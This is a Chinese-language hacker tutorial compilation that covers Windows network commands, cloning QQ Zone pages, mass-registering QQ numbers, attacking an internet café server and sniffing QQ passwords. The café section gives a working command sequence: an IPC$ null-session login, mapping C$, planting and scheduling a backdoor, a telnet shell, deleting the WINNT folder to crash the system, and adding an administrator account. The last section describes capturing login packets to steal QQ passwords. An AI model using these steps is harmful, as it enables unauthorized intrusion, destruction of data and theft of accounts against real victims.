黑客入门之必学命令篇(很详细)
基础知识部分
一、ping命令
在Windows的控制窗口中(Windows 95/98/ME的command解释器、Windows NT/2000的cmd解释器),运行ping可以看到这个命令的说明,它是一个探测本地电脑和远程电脑之间信息传送速度的命令,这个命令需要TCP/IP协议的支持,ping将会计算一条信息从本地发送到远程再返回所需要的时间,黑客使用这个命令决定是否对服务器进行攻击,因为连接速度过慢会浪费时间、花费过多的上网费用。
另外这个命令还可以透过域名找到对方服务器的IP地址,我们知道域名只是提供给浏览网页用的,当我们看到一个不错的域名地址后,要想通过telnet连接它,就必须知道对方的IP地址,这里也要使用ping命令的。
这个命令的基本使用格式可以通过直接运行ping获得,现在假设目标是http://www.abc.com/,则可以在控制台下输入ping http://www.abc.com,经过等待会得到如下信息:
Pinging http://www.abc.com [204.202.136.32] with 32 bytes of data:
Reply from 204.202.136.32: bytes=32 time=302ms TTL=240
Reply from 204.202.136.32: bytes=32 time=357ms TTL=240
Reply from 204.202.136.32: bytes=32 time=288ms TTL=240
Reply from 204.202.136.32: bytes=32 time=274ms TTL=240
Ping statistics for 204.202.136.32:
Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
Minimum = 274ms, Maximum = 357ms, Average = 305ms
这些信息的意思是:www.abc.com的IP地址是204.202.136.32,对他发送了四次数据包,数据包的大小是32字节,每一次返回的时间分别是302ms、357ms、288ms、274ms。综合看,发送了四个数据包全部返回,最小时间是274ms,最大时间357ms,他们的平均时间是305ms。
这样黑客就了解了连接对方服务器使用的时间。另外这个命令还有一些特殊的用法,例如可以通过IP地址反查服务器的NetBIOS名,现在以211.100.8.87为例,使用ping配合“-a”,在控制台下输入命令ping -a 211.100.8.87,它的返回结果是:
Pinging POPNET-FBZ9JDFV [211.100.8.87] with 32 bytes of data:
Reply from 211.100.8.87: bytes=32 time=96ms TTL=120
Reply from 211.100.8.87: bytes=32 time=110ms TTL=120
Reply from 211.100.8.87: bytes=32 time=110ms TTL=120
Reply from 211.100.8.87: bytes=32 time=109ms TTL=120
Ping statistics for 211.100.8.87:
Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
Minimum = 96ms, Maximum = 110ms, Average = 106ms
从这个结果会知道服务器的NetBIOS名称是POPNET-FBZ9JDFV。另外在一般情况下还可以通过ping对方让对方返回给你的TTL值大小,粗略的判断目标主机的系统类型是Windows系列还是UNIX/Linux系列,一般情况下Windows系列的系统返回的TTL值在100-130之间,而UNIX/Linux系列的系统返回的TTL值在240-255之间,例如上面的www.abc.com返回的TTL是240,对方的系统很可能是Linux,而第二个目标的TTL是120,那么说明它使用的系统也许是Windows。
另外ping还有很多灵活的应用,我不在这里过多的介绍,读者请另行查阅此命令相关帮助文件。
二、net命令:
NET命令是很多网络命令的集合,在Windows ME/NT/2000内,很多网络功能都是以net命令为开始的,通过net help可以看到这些命令的详细介绍:
NET CONFIG 显示系统网络设置
NET DIAG 运行MS的DIAGNOSTICS程序显示网络的DIAGNOSTIC信息
NET HELP 显示帮助信息
NET INIT 不通过绑定来加载协议或网卡驱动
NET LOGOFF 断开连接的共享资源
NET LOGON 在WORKGROUP中登陆
NET PASSWORD 改变系统登陆密码
NET PRINT 显示或控制打印作业及打印队列
NET START 启动服务,或显示已启动服务的列表
NET STOP 停止网络服务
NET TIME 使计算机的时钟与另一台计算机或域的时间同步
NET USE 连接计算机或断开计算机与共享资源的连接,或显示计算机的连接信息
NET VER 显示局域网内正在使用的网络连接类型和信息
NET VIEW 显示域列表、计算机列表或指定计算机的共享资源列表
这些命令在Win95/98中支持的比较少,只有几个基本常见的,而在NT或者2000中又元元多于上面的介绍,不过大多数对于初学者也没有必要掌握,所以我选择了WindowsME进行介绍,其中最常用到的是NET VIEW和NET USE,通过者两个命令,学习者可以连接网络上开放了远程共享的系统,并且获得资料。这种远程共享本来是为便捷操作设计的,但是很多网络管理员忽视了它的安全性,所以造成了很多不应该共享的信息的暴露,对于学习者来说,则可以轻易获得它人电脑上的隐私资料。
例如在控制台下输入net view \\202.96.50.24则可以获得对应IP的系统共享目录,进而找到他们的共享文件,当然这需要202.96.50.24系统的确存在共享目录,具体如何找到这些存在共享的系统,我将会在后面的文章中进行介绍。
三、telnet和ftp命令:
这两个命令分别可以远程对系统进行telnet登陆和ftp登陆,两种登陆使用的不同的协议,分别属于两种不同的网络服务,ftp是远程文件共享服务,也就是说学习者可以将自己的资料上传、下载,但是它并没有过多的权利,无法在远程电脑上执行上传的文件;而telnet则属于远程登陆服务,也就是说可以登陆到远程系统上,并获得一个解释器权限,拥有解释器就意味着拥有了一定的权限,这种权限可能是基本的文件操作、也可能是可以控制系统的管理员权限。
四、netstat命令:
这个程序有助于我们了解网络的整体使用情况。它可以显示当前正在活动的网络连接的详细信息,如采用的协议类型、当前主机与远端相连主机(一个或多个)的IP地址以及它们之间的连接状态等。 使用netstat ?可以显示它的命令格式和参数说明:
netstat [-a] [-e] [-n] [-s] [-p proto] [-r] [interval] 其中的参数说明如下:
-a 显示所有主机的端口号;
-e 显示以太网统计信息;
-n 以数字表格形式显示地址和端口;
-p proto 显示特定的协议的具体使用信息;
-r 显示本机路由表的内容;
-s 显示每个协议的使用状态(包括TCP、UDP、IP);
interval 重新显示所选的状态,每次显示之间的间隔数(单位秒)。netstat命令的主要用途是检测本地系统开放的端口,这样做可以了解自己的系统开放了什么服务、还可以初步推断系统是否存在木马,因为常见的网络服务开放的默认端口轻易不会被木马占用,例如:用于FTP(文件传输协议)的端口是21;用于TELNET(远程登录协议)的端口是23;用于SMTP(邮件传输协议)的端口是25;用于DNS(域名服务,即域名与IP之间的转换)的端口是53;用于HTTP(超文本传输协议)的端口是80;用于POP3(电子邮件的一种接收协议)的端口是110;WINDOWS中开放的端口是139,除此以外,如果系统中还有其他陌生的到口,就可能是木马程序使用的了。通过netstat或者netstat -a可以观察开放的端口,如果发现下面的端口,就说明已经有木马程序在系统中存在:
31337号端口是BackOffice木马的默认端口;1999是Yai木马程序;2140或者3150都是DEEP THROAT木马使用的端口;还有NETBUS、冰河或者SUB7等木马程序都可以自定义端口,因此发现了陌生端口一定要提高警惕,使用防火墙或者查病毒软件进行检测。
五、tracert命令:
这个命令的功能是判定数据包到达目的主机所经过的路径、显示数据包经过的中继节点清单和到达时间。tracert命令的格式如下:
tracert [-d] [-h maximum_hops] [-j host-list] [-w timeout] target_name
命令行中的参数-d是要求tracert不对主机名进行解析,-h是指定搜索到目的地址的最大轮数,-j的功能是沿着主机列表释放源路由,-w用来设置超时时间间隔。
通过tracert可以判断一个服务器是属于国内还是国际(网络服务器的物理未知不能依靠域名进行判断),根据路由路经可以判断信息从自己的系统发送到网络上,先后经过了哪些IP到大对方服务器,这就好像乘公共汽车的时候从起点出发到达终点站的时候,中途会出现很多路牌一个道理,我们清楚了自己的信息的传送路径,才能够更清晰的了解网络、对服务器进行攻击。
六、winipcfg:
winipcfg和ipconfig都是用来显示主机内IP协议的配置信息。只是winipcfg适用于Windows 95/98,而ipconfig适用于Windows NT。winipcfg不使用参数,直接运行它,它就会采用Windows窗口的形式显示具体信息。这些信息包括:网络适配器的物理地址、主机的IP地址、子网掩码以及默认网关等,点击其中的“其他信息”,还可以查看主机的相关信息如:主机名、DNS服务器、节点类型等。其中网络适配器的物理地址在检测网络错误时非常有用。
ipconfig的命令格式如下:ipconfig [/? | /all | /release [adapter] | /renew [adapter]
其中的参数说明如下:
使用不带参数的ipconfig命令可以得到以下信息:IP地址、子网掩码、默认网关。而使用ipconfig
/? 显示ipconfig的格式和参数的英文说明;
/all 显示所有的配置信息;
/release 为指定的适配器(或全部适配器)释放IP地址(只适用于DHCP);
/renew 为指定的适配器(或全部适配器)更新IP地址(只适用于DHCP)。
/all,则可以得到更多的信息:主机名、DNS服务器、节点类型、网络适配器的物理地址、主机的IP地址、子网掩码以及默认网关等。
把别人漂亮的QQ空间克隆一份
许多QQ空间的新手不会搜集代码,看着别人做的QQ空间超酷,自己却不知怎么入手。学习从模仿开始,我们可以先把别人的空间代码复制一份,弄个和他一样的QQ空间来研究研究。
第一步:首先我找一位朋友的QQ空间(在复制前最好先征得对方的同意),呵呵~卡通的透明背景Flash、飘移的文字……估计大多数人都喜欢这种布局吧
第二步:找到要复制的QQ空间后,记下对方的QQ号码,接着在IE浏览器中输入“http://q-zone.qq.com/fcg-bin/cgi_access_self.fcg?uin=对方的QQ号码&type=0”,此时会打开一个XML文件,在QQ空间中所有自定义的模块和设置都在这个XML文件里了,以下是部分代码:
<?xml version="1.0" encoding="gb2312" ?>
- <data>
<style>7</style>
<scenari_no>496</scenari_no>
<icoke>-1</icoke>
- <items>
- <item>
<type>1</type>
<itemno>1333</itemno>
<posx>0</posx>
<posy>0</posy>
<width>0</width>
<height>0</height>
<zindex>0</zindex>
</item>
- <item>
<type>6</type>
<itemno>703</itemno>
<posx>706</posx>
<posy>280</posy>
<width>210</width>
<height>120</height>
<zindex>0</zindex>
</item>
- <item>
<type>7</type>
<itemno>3942</itemno>
<posx>0</posx>
<posy>0</posy>
<width>1</width>
<height>73</height>
<zindex>0</zindex>
</item>
</items>
第三步:新建一个文本文件,接着将XML文件的“<itemno></itemno>”中的数字以如下形式进行整理:
1333|703|3942|3942……
第四步:在IE浏览器中输入“http://q-zone.qq.com/fcg-bin/cgi_diy_window.fcg?uin=对方的QQ号码&type=11&wndid=在文本文件中整理的数字”,呵呵~打开后你看到了什么?是不是有些像自定义的代码呢?下面是部分代码:
<?xml version="1.0" encoding="gb2312" ?>
- <data>
- <window>
<id>219107532</id>
<title>滚动条</title>
- <item>
<id>18134</id>
<style>0</style>
<img>http://</img>
<title />
<url>http://</url>
<content><img src="javascript:document.getElementById
('initd').style.overflow='hidden';"></content>
</item>
</window>
- <window>
<id>220026097</id>
<title>flash2</title>
- <item>
<id>17966</id>
<style>0</style>
<img>http://</img>
<title />
<url>http://</url>
<content><img src="javascript:document.getElementById ('Mlogo').innerHTML+='<div
style=\'position:absolute;top:0;left:0;\'><EMBED
src=\'http://imgfree.21cn.com/free/flash/9.swf\' quality=high wmode=\'transparent\'
WIDTH=\'925\' HEIGHT=\'655\' TYPE=\'application/x-shockwave-flash\'></div>';"></content>
</item>
</window>
- <window>
<id>216267259</id>
<title>鼠标</title>
- <item>
<id>17780</id>
<style>0</style>
<img>http://</img>
<title />
<url>http://</url>
<content><img src="javascript:document.body.style.cursor='url
(\'http://qqjia.com/learn/q-zone/ani6/1.ani\')'"></content>
</item>
</window>
对,就是它!在打开页面中黑色显示的文字就是该QQ空间自定义的模块代码了。
第五步:你现在要做的就是将页面中黑色的自定义代码一一添加到你的QQ空间里即可。
自己刷QQ靓号 (申精)
“按键精灵”就可以化繁杂为简单(点击下载:按键精灵),它实际上是一款记录键盘鼠标按键操作的软件,利用它可以实现自动执行一系列键盘鼠标动作的功能。
工作界面——舞台搭建
在“按键精灵”的主界面中点击“增加”按钮出现“脚本编辑器”窗口,整个界面分为三大部分:左侧为动作选择区,右侧上部为脚本设置区,右侧下部为脚本内容区。需要“按键精灵”自动执行的所有动作都需要先在“动作选择区”中选定,然后插入“脚本内容区”。
申请QQ——实战演1、抓取鼠标位置
先启动QQ,点击“注册向导”,弹出申请新的QQ号窗口(一定不要移动该窗口的位置),顺次操作,直到出现“网络设置”窗口。此时再启动“按键精灵”,在图1的“宏的描述”处输入动作名称(如“自动申请QQ号码”),定义启动热键为Ctrl+F2,中止热键不要改动了,就使用Ctrl+F12,然后在动作区“鼠标动作”中选择动作方式,接着点击“抓点”按钮,将鼠标移动到QQ“网络设置”界面的“下一步”按钮上,然后按“Ctrl+Alt+1”键(注意:1是大键盘上的数字键,而不是小键盘上的)将鼠标位置抓下来。在QQ“网络设置”界面上再点击“下一步”,弹出QQ“完成”窗口,将鼠标移到“上一步”按钮上,按“Ctrl+Alt+2”键,将鼠标位置再抓下来,然后“退出抓点”状态。
2、插入“下一步”点击
点击“抓点”下的“插入”按钮在“脚本内容区”插入鼠标位置;再点击“鼠标左键”下的“插入”按钮插入点击鼠标左键动作。这是模拟向服务器发出申请QQ号码的操作。 3、加入延时
测试服务器是否繁忙是需要一段时间的,因此在这里要插入延时时间。点击左下角的“其它动作”右侧的箭头,在“延时时间”处设置为30秒(可根据自己的网络速度适当调整),然后点击其下部的“插入”按钮插入延时30000毫秒。
4、插入“上一步”点击
回到“鼠标控制”设置项,点击“抓点”右侧的三角形按钮,选择“P2:X=333 Y=455”项(这是我们抓的“上一步”鼠标位置),点击“插入”按钮插入鼠标位置,点击“鼠标左键”下的“插入”按钮插入点击鼠标左键动作,完成模拟QQ返回上一级窗口的操作。
5、循环操作直到按终止键
由于我们不知道向服务器发出多少次申请才能成功,因此可设置为一直重复操作,直到申请成功或按终止键后停止。点击右上部的“循环”按钮,选择“重复到按终止键为止”项,当然你也可根据自己的情况选择重复时间或循环次数。
至此,一个自动申请QQ的脚本就制作完成了,点击右侧最底部的“存盘退出”按钮返回主窗口。在主窗口中已经能够看到我们制作的脚本了。
现在就来申请QQ号吧!首先来到QQ“网络设置”窗口,然后按热键Ctrl+F2就可以了,等上一段时间,一个QQ号码就申请到手了。
攻击网吧主机
先查它的ip IP:61.141.xxx.xxx (方法很多的)
我就打开DOS输入:net use \\61.141.xxx.xxx\ipc$
提示输入密码(网吧的服务器一般是对客房机共享,所以......嘿嘿):
我估计是空!
直接按下[Enter]
真的被我猜中了!
接着我便继续输入:net use \\61.141.xxx.xxx\c$
提示输入密码:
我也没有理会!
谁知道这下不管用了!
找他的弱口令X-SCANNER(下载地方http://www.xfocus.org)扫它。
我接着就映射他的c盘
net use z: \\61.141.xxx.xxx\c$
接着把NETX99放上去!
看他的时间!
net time \\61.141.xxx.xxx
他的时间是假如是下午3:02分
接着安排他的执行时间!
at \\61.141.xxx.xxx 15:04 ncx99.exe
命令成功完成!
接下来就是等时间了!
OK!到时间了!
telnet 61.141.xxx.xxx 99
进入了!
c:\>rd /s /q WINNT
呵呵!这时你会发现有很多文件拒绝访问!不要害怕!这是很正常的事情!因为他有很多文件正在调用! 不过他的机器很快就会拼命报错!直到系统崩溃!呵呵!对于一个网吧来说!这个无疑是一个致命的打击!没有主机怎么上网?只有关门了!呵呵!接着就是如何获取ADMIN的权限了!
我们首先把他的C盘映射成为我们的Z盘!
开始--运行--cmd
输入:net use z: //61.141.xxx.xxx/c$ "密码" /user:"用户名"
出现:命令成功完成
这时候你打开“我的电脑”看看!
是不是多了一个Z盘?
接着不用我多说了吧?
首先必须创建一个你自己的用户名
输入:net user 用户名 "密码" /add
出现:命令成功完成
OK!
接着就是如何把你创建的用户加到ADMIN组了!
输入:net localgroup administrators “用户名” /add
OK,出现:命令成功完成
不用木马,轻松万能偷盗QQ号码
首先,我们要用到wpe,你别说你不知道是什么,这是一个拦截个修改封包数据的工具,很好用哦。
好我们先演示一下WPE的使用,便于初次使用的朋友学习。先启动这个IE,然后进入WPE选择 IEXPLORE。EXE这个程序,就是白色字那个了,我们选定它,作为我们研究的对象。然后是发送封包接收封包的问题了,为了从最简单的入手,我们先把网线拔了,什么?不明白网线是什么?那我无法说明了,你别问我,问旁边的人吧,一定有人知道的,反正就是你上网那根线,先把它拔下来,这样就没有封包返回,方便研究!下面看看,我们从最简单的入手,首先我们发送一个地址,就在IE中输入地址,然后按回车,这里我们输入的地址是:http://fengyes.con.cn/结果看到了吧,右边有封包的分析,对于简单的未加密的封包,WPE可以自动分析,下面我们输入地址:http://fengyes.con.cn/ 结果又看到了哦。
这是第一步如果你顺利完成,看下一步,分析封包了哦,注意~ 我们比较一下两个封包,可以发现,相同的部分很多,按我们的分析应该差别只应该在“ee”与"ff"的区别,因为发送的内容只有这点差别,但是上面的封包显示出来的却不是这样,为什么?
其实,他们确实是一样的,在IE的封包里面,01、02、03、04都代表点的意思,也就是代表:“.”这个意思,那么你再分析就发现完全和我们预料的一样了,这里是IE发送的封包,没有加密的,您可以直接读出来的!但是这不是10进制,而是16进制,因此,我们必须把它翻译成为10进制,以方便我们阅读,怎么办?
别忘了,我在WPE下载页给出了一个Asic II工具,现在就用吧。
好,我们来翻译这个封包,前面的不管,我们只关心封包里面的数据:打开Asic II工具,输入"W",点查看,看到了什么?------“77”(十六进制),看到了吧,我们输入的有3个“W”,这里是不是有3个77啊?前面已经讲过,02代表点号,那么,接下来是不是也是我们预料的是“f”呢?我们继续用工具查一下看看,果然不出我们分析所料,真是f,不用多猜了,接下来的内容就是".com"怎么样?是不是很简单呢?
还不懂?那我还讲一次吧。
在Internet Exproler中输入http://fengyes.con.cn/,然后按回车,在WPE中点拦截,点三角形,收到封包后点红色的正方形,封包就出现了。
我们来分析一下上面的内容!
首先几点说明,这是对Internet Exproler进行的封包操作,请求的地址暂时不说,您可以分析出来的!下面是分析说明!
首先,本地发送请求到服务器!发送内容是“21”,注意:您一定很容易地认为发送的是“21”,其实,数字也好,字母也好,一定要注意,全都是16进制的,所以,这个“21”不是我们平常的21,而是16进制的21,那我们来算一下21等于多少(计算21转换为10进制等于多少)?21(16位)=2 x 16 + 1 = 33 (10进制)。
再查ASCII表,看看33对应的是什么字符?查到了吗?是“!”,呵呵,WPE不是已经在右边给我们显示了吗?不过我们要习惯分析哦,到游戏里面可就没那么多的方便了!
那么发送一个!是什么意思呢?其实这个是网络连接的问题了,不必细究,要详细了解的请查看关于网络连接3次握手的相关内容!这里不做讲解!这个与游戏修改无关!
第3行47是什么意思呢?算一下:47(16)=4 x 16 + 7 = 71(10)括号内16代表16进制,10代表10进制,那么71代表什么?查表ASCII结果:71对应字母“G”。
45呢?45(16)=4 X 16 +5 =69(10),查表出来的结果是:E。
请你不要看右边的分析,我知道右边有现成的结果,但是你要自己分析,不然你拿着游戏就无从下手了!简单的分析就是这样了,是不是很轻松?好,再继续分析几个!
第15行,的3A什么意思?
3A(16)=3 X 16 + 10 = 58(10),查表得,58对应“ :” 。
倒数第2行B7什么意思?
B7(16)=11 X 16 + 7 =183(10),查表得到183对应:特殊字符,这里我无法帮你打出这个字符,抱歉!
注意,这里WPE也翻译不出来对应的字符了,看到了吗?WPE只翻译了最后两个,如果我们自己需要怎么办?当然是自己分析了,所以说不要看WPE帮你的分析,自己分析很重要。
同样,盗QQ也简单嘛~~拦截他对服务器所发送的登陆封包数据,看看,分析一下,密码来了,脱离木马的感觉爽吗,哈哈~
还有进制数转换可以用WINDOWS自带的计算器,有这个功能,方便吧?会了吗,嘿嘿。 |
